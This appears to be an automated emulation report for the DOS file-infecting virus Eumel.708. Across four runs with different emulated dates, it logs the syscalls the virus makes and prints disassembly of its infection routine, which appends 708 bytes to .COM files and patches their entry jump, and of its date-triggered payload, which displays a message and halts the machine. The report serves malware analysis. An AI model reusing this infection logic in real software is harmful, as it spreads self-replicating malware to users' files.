Sample viewer

vx.netlux.org/Virus.DOS.Eumel.708


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:12:41.584173208Z 26 PC: 13e6f | Set disk transfer address
2018-12-17T22:12:41.586204011Z 25 PC: 13e7d | Get default drive
2018-12-17T22:12:41.587418877Z 14 PC: 13e87 | Set default drive (Drive = 'D')
2018-12-17T22:12:41.588736071Z 78 PC: 13e91 | Find first file
2018-12-17T22:12:41.595872144Z 61 PC: 13e9e | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:12:41.603125302Z 66 PC: 13f69 | Move file pointer
2018-12-17T22:12:41.604530052Z 62 PC: 13ec2 | Close file
2018-12-17T22:12:41.606308758Z 79 PC: 13e91 | Find next file
2018-12-17T22:12:41.609176049Z 61 PC: 13e9e | Open file (Filename = 'PRINT.COM')
2018-12-17T22:12:41.61598703Z 66 PC: 13f69 | Move file pointer
2018-12-17T22:12:41.617320129Z 62 PC: 13ec2 | Close file
2018-12-17T22:12:41.62020455Z 79 PC: 13e91 | Find next file
2018-12-17T22:12:41.623410223Z 61 PC: 13e9e | Open file (Filename = 'HELLO.COM')
2018-12-17T22:12:41.630464685Z 66 PC: 13f69 | Move file pointer
2018-12-17T22:12:41.632716445Z 62 PC: 13ec2 | Close file
2018-12-17T22:12:41.634880143Z 79 PC: 13e91 | Find next file
2018-12-17T22:12:41.637730865Z 61 PC: 13e9e | Open file (Filename = 'PHANG.COM')
2018-12-17T22:12:41.650442198Z 66 PC: 13f69 | Move file pointer
2018-12-17T22:12:41.653082331Z 62 PC: 13ec2 | Close file
2018-12-17T22:12:41.655167286Z 79 PC: 13e91 | Find next file
2018-12-17T22:12:41.659136791Z 61 PC: 13e9e | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:12:41.66581652Z 66 PC: 13f69 | Move file pointer
2018-12-17T22:12:41.667416873Z 62 PC: 13ec2 | Close file
2018-12-17T22:12:41.670495717Z 79 PC: 13e91 | Find next file
2018-12-17T22:12:41.673859962Z 61 PC: 13e9e | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:12:41.680559771Z 66 PC: 13f69 | Move file pointer
2018-12-17T22:12:41.682269619Z 62 PC: 13ec2 | Close file
2018-12-17T22:12:41.68628976Z 79 PC: 13e91 | Find next file
2018-12-17T22:12:41.688749357Z 61 PC: 13e9e | Open file (Filename = 'PAH.COM')
2018-12-17T22:12:41.695204389Z 66 PC: 13f69 | Move file pointer
2018-12-17T22:12:41.698140782Z 62 PC: 13ec2 | Close file
2018-12-17T22:12:41.700130283Z 79 PC: 13e91 | Find next file
2018-12-17T22:12:41.702883407Z 61 PC: 13e9e | Open file (Filename = 'TEST.COM')
2018-12-17T22:12:41.713054886Z 66 PC: 13f69 | Move file pointer
2018-12-17T22:12:41.714753952Z 87 PC: 13eb5 | Get or set file date and time
2018-12-17T22:12:41.716344464Z 44 PC: 13ed2 | Get time
0x13ed2: add dl, 0x66
0x13ed5: mov byte ptr [bp + 0x109], dl
0x13ed9: mov ax, 0x4200
0x13edc: call 0x13f63
0x13edf: mov ah, 0x3f
0x13ee1: lea dx, word ptr [bp + 0x3c0]
0x13ee5: mov cx, 3
0x13ee8: int 0x21
0x13eea: mov ax, 0x4202
0x13eed: call 0x13f63
0x13ef0: sub ax, 3
0x13ef3: mov word ptr cs:[bp + 0x230], ax
0x13ef8: lea si, word ptr [bp + 0x105]
0x13efc: mov di, 0xfac8
0x13eff: mov cx, 0x2c4
0x13f02: cld
0x13f03: rep movsb byte ptr es:[di], byte ptr [si]
0x13f05: mov si, 0xfae8
0x13f08: call 0x23e50
0x13f0b: mov ah, 0x40
2018-12-17T22:12:41.719231134Z 66 PC: 13f69 | Move file pointer
2018-12-17T22:12:41.720522142Z 63 PC: 13eea | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:12:41.727685192Z 66 PC: 13f69 | Move file pointer
2018-12-17T22:12:41.729968956Z 64 PC: 13f15 | Write file or device (Write 708 bytes on handle 5)
2018-12-17T22:12:41.742895182Z 66 PC: 13f69 | Move file pointer
2018-12-17T22:12:41.744360647Z 64 PC: 13f26 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:12:41.74815517Z 87 PC: 13f2d | Get or set file date and time
2018-12-17T22:12:41.749661923Z 62 PC: 13f31 | Close file
2018-12-17T22:12:41.757902628Z 42 PC: 13f35 | Get date
0x13f35: add dl, 9
0x13f38: cmp dh, dl
0x13f3a: jne 0x13f4f
0x13f3c: cmp cx, 0x7cb
0x13f40: jb 0x13f4f
0x13f42: mov ah, 9
0x13f44: lea dx, word ptr [bp + 0x232]
0x13f48: int 0x21
0x13f4a: call 0x13fbe
0x13f4d: cli
0x13f4e: hlt
0x13f4f: mov ah, 0x1a
0x13f51: mov dx, 0x80
0x13f54: int 0x21
0x13f56: mov ah, 0xe
0x13f58: mov dl, byte ptr [bp + 0x3c9]
0x13f5c: int 0x21
0x13f5e: popaw
0x13f5f: push 0x100
0x13f62: ret
2018-12-17T22:12:41.761325246Z 26 PC: 13f56 | Set disk transfer address
2018-12-17T22:12:41.762617022Z 14 PC: 13f5e | Set default drive (Drive = 'A')
2018-12-17T22:12:41.764082711Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-17T22:12:41.770130849Z 0 PC: 12a89 | Program terminate

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2529,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:01.226788882Z 26 PC: 13e6f | Set disk transfer address
2018-12-25T11:46:01.235022524Z 25 PC: 13e7d | Get default drive
2018-12-25T11:46:01.236198897Z 14 PC: 13e87 | Set default drive (Drive = 'D')
2018-12-25T11:46:01.237772814Z 78 PC: 13e91 | Find first file
2018-12-25T11:46:01.250818862Z 61 PC: 13e9e | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:01.257156988Z 66 PC: 13f69 | Move file pointer
2018-12-25T11:46:01.25867462Z 62 PC: 13ec2 | Close file
2018-12-25T11:46:01.261124341Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.263801069Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.27079206Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.273080866Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.275035334Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.277614633Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.284263716Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.286437348Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.288144139Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.290593002Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.303157075Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.304497095Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.306119431Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.309387993Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.316073414Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.317447498Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.32028273Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.322927605Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.329603244Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.332072236Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.334088182Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.336499167Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.344036963Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.34579258Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.347779103Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.351664765Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.358371114Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.360023226Z 87 PC: 13eb5 | Get or set file date and time
2018-12-25T11:46:01.361826435Z 44 PC: 13ed2 | Get time
0x13ed2: add dl, 0x66
0x13ed5: mov byte ptr [bp + 0x109], dl
0x13ed9: mov ax, 0x4200
0x13edc: call 0x13f63
0x13edf: mov ah, 0x3f
0x13ee1: lea dx, word ptr [bp + 0x3c0]
0x13ee5: mov cx, 3
0x13ee8: int 0x21
0x13eea: mov ax, 0x4202
0x13eed: call 0x13f63
0x13ef0: sub ax, 3
0x13ef3: mov word ptr cs:[bp + 0x230], ax
0x13ef8: lea si, word ptr [bp + 0x105]
0x13efc: mov di, 0xfac8
0x13eff: mov cx, 0x2c4
0x13f02: cld
0x13f03: rep movsb byte ptr es:[di], byte ptr [si]
0x13f05: mov si, 0xfae8
0x13f08: call 0x23e50
0x13f0b: mov ah, 0x40
2018-12-25T11:46:01.364725145Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.366702815Z 63 PC: 13eea | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:46:01.369959573Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.372350661Z 64 PC: 13f15 | Write file or device (Write 708 bytes on handle 5)
2018-12-25T11:46:01.38595599Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.387750128Z 64 PC: 13f26 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:01.390389022Z 87 PC: 13f2d | Get or set file date and time
2018-12-25T11:46:01.39179004Z 62 PC: 13f31 | Close file
2018-12-25T11:46:01.400157381Z 42 PC: 13f35 | Get date
0x13f35: add dl, 9
0x13f38: cmp dh, dl
0x13f3a: jne 0x13f4f
0x13f3c: cmp cx, 0x7cb
0x13f40: jb 0x13f4f
0x13f42: mov ah, 9
0x13f44: lea dx, word ptr [bp + 0x232]
0x13f48: int 0x21
0x13f4a: call 0x13fbe
0x13f4d: cli
0x13f4e: hlt
0x13f4f: mov ah, 0x1a
0x13f51: mov dx, 0x80
0x13f54: int 0x21
0x13f56: mov ah, 0xe
0x13f58: mov dl, byte ptr [bp + 0x3c9]
0x13f5c: int 0x21
0x13f5e: popaw
0x13f5f: push 0x100
0x13f62: ret
2018-12-25T11:46:01.402163961Z 26 PC: 13f56 | Set disk transfer address
2018-12-25T11:46:01.403031826Z 14 PC: 13f5e | Set default drive (Drive = 'A')
2018-12-25T11:46:01.404979994Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-25T11:46:01.410304949Z 0 PC: 12a89 | Program terminate

{"DateBased":true,"Day":1,"Month":10,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2529,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:01.550827092Z 26 PC: 13e6f | Set disk transfer address
2018-12-25T11:46:01.552448682Z 25 PC: 13e7d | Get default drive
2018-12-25T11:46:01.553590375Z 14 PC: 13e87 | Set default drive (Drive = 'D')
2018-12-25T11:46:01.554688663Z 78 PC: 13e91 | Find first file
2018-12-25T11:46:01.561704226Z 61 PC: 13e9e | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:01.568853205Z 66 PC: 13f69 | Move file pointer
2018-12-25T11:46:01.570100996Z 62 PC: 13ec2 | Close file
2018-12-25T11:46:01.571915183Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.574920099Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.582433076Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.583820143Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.58596611Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.588655577Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.596737498Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.598952613Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.600745334Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.603794821Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.617249026Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.6186719Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.620309719Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.623274532Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.630364884Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.631707324Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.633909008Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.636555396Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.64438053Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.646284162Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.648157275Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.651028831Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.658946952Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.66039504Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.662069923Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.664824332Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.672756047Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.674108201Z 87 PC: 13eb5 | Get or set file date and time
2018-12-25T11:46:01.675437585Z 44 PC: 13ed2 | Get time
0x13ed2: add dl, 0x66
0x13ed5: mov byte ptr [bp + 0x109], dl
0x13ed9: mov ax, 0x4200
0x13edc: call 0x13f63
0x13edf: mov ah, 0x3f
0x13ee1: lea dx, word ptr [bp + 0x3c0]
0x13ee5: mov cx, 3
0x13ee8: int 0x21
0x13eea: mov ax, 0x4202
0x13eed: call 0x13f63
0x13ef0: sub ax, 3
0x13ef3: mov word ptr cs:[bp + 0x230], ax
0x13ef8: lea si, word ptr [bp + 0x105]
0x13efc: mov di, 0xfac8
0x13eff: mov cx, 0x2c4
0x13f02: cld
0x13f03: rep movsb byte ptr es:[di], byte ptr [si]
0x13f05: mov si, 0xfae8
0x13f08: call 0x23e50
0x13f0b: mov ah, 0x40
2018-12-25T11:46:01.677862995Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.679077996Z 63 PC: 13eea | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:46:01.686106035Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.68821903Z 64 PC: 13f15 | Write file or device (Write 708 bytes on handle 5)
2018-12-25T11:46:01.703707643Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.704991051Z 64 PC: 13f26 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:01.708297131Z 87 PC: 13f2d | Get or set file date and time
2018-12-25T11:46:01.709792131Z 62 PC: 13f31 | Close file
2018-12-25T11:46:01.718119904Z 42 PC: 13f35 | Get date
0x13f35: add dl, 9
0x13f38: cmp dh, dl
0x13f3a: jne 0x13f4f
0x13f3c: cmp cx, 0x7cb
0x13f40: jb 0x13f4f
0x13f42: mov ah, 9
0x13f44: lea dx, word ptr [bp + 0x232]
0x13f48: int 0x21
0x13f4a: call 0x13fbe
0x13f4d: cli
0x13f4e: hlt
0x13f4f: mov ah, 0x1a
0x13f51: mov dx, 0x80
0x13f54: int 0x21
0x13f56: mov ah, 0xe
0x13f58: mov dl, byte ptr [bp + 0x3c9]
0x13f5c: int 0x21
0x13f5e: popaw
0x13f5f: push 0x100
0x13f62: ret
2018-12-25T11:46:01.720617564Z 26 PC: 13f56 | Set disk transfer address
2018-12-25T11:46:01.721643955Z 14 PC: 13f5e | Set default drive (Drive = 'A')
2018-12-25T11:46:01.722721295Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-25T11:46:01.728989254Z 0 PC: 12a89 | Program terminate

{"DateBased":true,"Day":1,"Month":10,"Year":1995,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2529,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:01.804715149Z 26 PC: 13e6f | Set disk transfer address
2018-12-25T11:46:01.806714169Z 25 PC: 13e7d | Get default drive
2018-12-25T11:46:01.80874555Z 14 PC: 13e87 | Set default drive (Drive = 'D')
2018-12-25T11:46:01.810576974Z 78 PC: 13e91 | Find first file
2018-12-25T11:46:01.818285733Z 61 PC: 13e9e | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:01.826932032Z 66 PC: 13f69 | Move file pointer
2018-12-25T11:46:01.828787338Z 62 PC: 13ec2 | Close file
2018-12-25T11:46:01.830688481Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.833799142Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.847124651Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.8486833Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.852199228Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.854943168Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.862183496Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.864340252Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.866284144Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.868963416Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.875973028Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.877713318Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.879409272Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.881938528Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.889709657Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.89101223Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.892833239Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.895729641Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.902669441Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.904085515Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.906280086Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.908950319Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.91673585Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.918512703Z 62 PC: 13ec2 | Close file (See above)
2018-12-25T11:46:01.920993431Z 79 PC: 13e91 | Find next file (See above)
2018-12-25T11:46:01.923700299Z 61 PC: 13e9e | Open file (See above)
2018-12-25T11:46:01.931282924Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.932736471Z 87 PC: 13eb5 | Get or set file date and time
2018-12-25T11:46:01.934091593Z 44 PC: 13ed2 | Get time
0x13ed2: add dl, 0x66
0x13ed5: mov byte ptr [bp + 0x109], dl
0x13ed9: mov ax, 0x4200
0x13edc: call 0x13f63
0x13edf: mov ah, 0x3f
0x13ee1: lea dx, word ptr [bp + 0x3c0]
0x13ee5: mov cx, 3
0x13ee8: int 0x21
0x13eea: mov ax, 0x4202
0x13eed: call 0x13f63
0x13ef0: sub ax, 3
0x13ef3: mov word ptr cs:[bp + 0x230], ax
0x13ef8: lea si, word ptr [bp + 0x105]
0x13efc: mov di, 0xfac8
0x13eff: mov cx, 0x2c4
0x13f02: cld
0x13f03: rep movsb byte ptr es:[di], byte ptr [si]
0x13f05: mov si, 0xfae8
0x13f08: call 0x23e50
0x13f0b: mov ah, 0x40
2018-12-25T11:46:01.936950169Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.939055718Z 63 PC: 13eea | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:46:01.946086005Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.947626667Z 64 PC: 13f15 | Write file or device (Write 708 bytes on handle 5)
2018-12-25T11:46:01.964001124Z 66 PC: 13f69 | Move file pointer (See above)
2018-12-25T11:46:01.965389668Z 64 PC: 13f26 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:01.968175563Z 87 PC: 13f2d | Get or set file date and time
2018-12-25T11:46:01.984444959Z 62 PC: 13f31 | Close file
2018-12-25T11:46:01.993387126Z 42 PC: 13f35 | Get date
0x13f35: add dl, 9
0x13f38: cmp dh, dl
0x13f3a: jne 0x13f4f
0x13f3c: cmp cx, 0x7cb
0x13f40: jb 0x13f4f
0x13f42: mov ah, 9
0x13f44: lea dx, word ptr [bp + 0x232]
0x13f48: int 0x21
0x13f4a: call 0x13fbe
0x13f4d: cli
0x13f4e: hlt
0x13f4f: mov ah, 0x1a
0x13f51: mov dx, 0x80
0x13f54: int 0x21
0x13f56: mov ah, 0xe
0x13f58: mov dl, byte ptr [bp + 0x3c9]
0x13f5c: int 0x21
0x13f5e: popaw
0x13f5f: push 0x100
0x13f62: ret
2018-12-25T11:46:01.995608738Z 9 PC: 13f4a | Display string (String= ' You have got the NO TRON Virus! Don't support TRON in D-17149 Stavenhagen')